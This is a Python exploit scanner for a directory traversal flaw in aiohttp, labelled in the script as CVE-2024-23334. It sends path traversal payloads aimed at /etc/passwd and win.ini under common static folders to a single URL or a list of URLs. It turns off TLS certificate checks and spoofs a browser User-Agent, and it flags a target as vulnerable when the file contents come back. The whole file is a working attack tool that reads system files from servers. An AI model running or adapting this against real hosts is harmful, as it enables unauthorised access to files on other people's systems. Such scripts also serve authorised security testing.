import requests
from urllib.parse import urlparse
import argparse
import urllib3
import urllib.request
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def read_file(file_path):
    with open(file_path, 'r') as file:
        urls = file.read().splitlines()
    return urls
    
def get_paloads():
    traversals = []
    path=''
    for i in range(0,6):
        traversals.append(path)
        path += '/..'
    payloads = []
    for i in ['/etc/passwd','/C:\windows\win.ini']:
        for traversal in traversals:
            payload = traversal+i
            payloads.append(payload)

    oftendirs = ['/statictest', '/static','/test', '/js']
    finalpayloads = []
    for i in oftendirs:
        for j in payloads:
            finalpayload = i + j
            finalpayloads.append(finalpayload)

    return finalpayloads

def directory_traversal(target):
    try:
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36",
        }
        response = urllib.request.Request(target, headers=headers, method="GET", unverifiable=True)
        auth_response = urllib.request.urlopen(response)
        response_context = auth_response.read().decode()
        if response_context:
            return response_context
    except Exception as e:
        pass

def check(url):
    try:
        url = url.rstrip('/')
        payloads = get_paloads()
        for payload in payloads:
            target = url + payload
            content = directory_traversal(target)
            if content!=None:
                if 'root:x:' in content or '[extensions]' in content:
                    print(f"\033[31mDiscovered:{url}: aiothhp_CVE-2024-23334_DirectoryTraversal!\033[0m")
                    return True
    except Exception as e:
        print(e)


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="URL")
    parser.add_argument("-f", "--txt", help="file")
    args = parser.parse_args()
    url = args.url
    txt = args.txt
    if url:
        check(url)
    elif txt:
        urls = read_file(txt)
        for url in urls:
            check(url)
